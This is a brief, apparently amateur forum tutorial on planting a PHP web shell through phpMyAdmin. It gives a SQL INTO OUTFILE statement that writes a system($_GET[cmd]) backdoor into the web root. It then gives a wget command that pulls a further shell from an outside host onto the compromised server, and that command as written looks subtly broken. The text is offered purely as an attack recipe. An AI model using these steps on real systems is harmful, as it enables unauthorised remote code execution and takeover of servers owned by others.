Hello, In this tutorial I will show you how to put your shell via phpmyadmin. To begin, you must look in the phpinfo() line "document_root" : This will help us later. After, in phpmyadmin, go to a database or create one. Go into the SQL tab and put :
SELECT '<?php system($_GET[cmd]) ?>' INTO OUTFILE '\DOCUMENT_ROOT\cmd.php'
Once this is done your document "cmd.php" is created. You can list files and directories with the ls command (if the site is under linux) To upload your shell must use the command wget. wget http://server.com/shell.txt > yourfile.php And now, your shell is on the server. Sorry for my bad English. Loadz.